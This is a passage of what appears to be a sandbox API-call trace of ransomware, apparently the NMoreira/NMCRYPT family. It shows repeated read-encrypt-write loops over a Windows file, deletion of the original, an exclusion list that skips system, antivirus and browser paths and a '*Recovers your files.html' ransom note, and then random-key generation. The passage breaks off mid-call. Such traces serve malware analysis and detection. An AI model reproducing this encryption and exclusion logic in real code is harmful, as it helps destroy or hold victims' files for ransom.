lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.265] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.265] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.265] GetLastError () returned 0x0 [0167.265] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.265] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.265] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.265] GetLastError () returned 0x0 [0167.265] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.265] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.265] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.265] GetLastError () returned 0x0 [0167.265] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.265] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.265] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.265] GetLastError () returned 0x0 [0167.265] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.265] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.265] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.265] GetLastError () returned 0x0 [0167.265] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.265] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.265] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.265] GetLastError () returned 0x0 [0167.265] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.265] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.265] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.266] GetLastError () returned 0x0 [0167.266] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.266] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.266] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.266] GetLastError () returned 0x0 [0167.266] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.266] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.266] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.266] GetLastError () returned 0x0 [0167.266] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.266] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.266] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.266] GetLastError () returned 0x0 [0167.266] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.266] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.266] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.266] GetLastError () returned 0x0 [0167.266] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.266] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.266] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.266] GetLastError () returned 0x0 [0167.266] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.266] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.266] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.266] GetLastError () returned 0x0 [0167.266] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.267] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.267] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.267] GetLastError () returned 0x0 [0167.267] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.267] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.267] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.267] GetLastError () returned 0x0 [0167.267] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.267] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.267] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x110) returned 1 [0167.267] GetLastError () returned 0x0 [0167.267] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x110, lpOverlapped=0x0) returned 1 [0167.267] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0167.267] WriteFile (in: hFile=0x15c4, lpBuffer=0x2882928*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0167.267] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb")) returned 0x20 [0167.267] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb", dwFileAttributes=0x20) returned 0 [0167.268] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 1 [0167.268] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb")) returned 0 [0167.268] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" [0167.268] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado") returned 1 [0167.268] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xXEC.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xxec.tmp")) returned 0xec [0167.268] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xXEC.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xxec.tmp"), dwFlags=0x1) returned 0 [0167.269] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xXEC.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xxec.tmp")) returned 1 [0167.269] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0167.269] wcslen (_String="OK") returned 0x2 [0167.269] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0167.269] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0167.269] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0167.269] CryptDestroyHash (hHash=0x9ad3b8) returned 1 [0167.269] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0167.269] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0167.269] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*NMCRYPT") returned 0 [0167.269] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*Recovers your files.html") returned 0 [0167.269] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*.exe") returned 0 [0167.269] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*.dll") returned 0 [0167.269] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*.lnk") returned 0 [0167.269] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*.bat") returned 0 [0167.269] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*.ini") returned 0 [0167.269] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*.msi") returned 0 [0167.269] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*.scf") returned 0 [0167.269] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*pagefile.sys*") returned 0 [0167.269] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*NTUSER.DAT*") returned 0 [0167.269] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*AppData*") returned 0 [0167.269] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*\\winrar\\*") returned 0 [0167.269] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*\\Internet Explorer\\*") returned 0 [0167.269] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*\\java\\*") returned 0 [0167.269] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*\\TeamViewer\\*") returned 0 [0167.269] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*\\windows\\*") returned 0 [0167.270] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*\\ESET\\*") returned 0 [0167.270] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*\\AVG\\*") returned 0 [0167.270] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*\\AVIRA\\*") returned 0 [0167.270] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*\\AVAST Software\\*") returned 0 [0167.270] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*Atheros*") returned 0 [0167.270] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*Realtek*") returned 0 [0167.270] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*bootmgr*") returned 0 [0167.270] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*boot*") returned 0 [0167.270] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*boot*") returned 0 [0167.270] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*CONFIG.SYS*") returned 0 [0167.270] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*IO.SYS*") returned 0 [0167.270] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*MSDOS.SYS*") returned 0 [0167.270] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*NTDETECT.COM*") returned 0 [0167.270] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*ntldr*") returned 0 [0167.270] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*chrome*") returned 0 [0167.270] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*opera*") returned 0 [0167.270] PathMatchSpecW (pszFile="msado25.tlb", pszSpec="*firefox*") returned 0 [0167.270] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb", pszSpec="*") returned 1 [0167.270] strlen (_Str="NMoreira") returned 0x8 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: 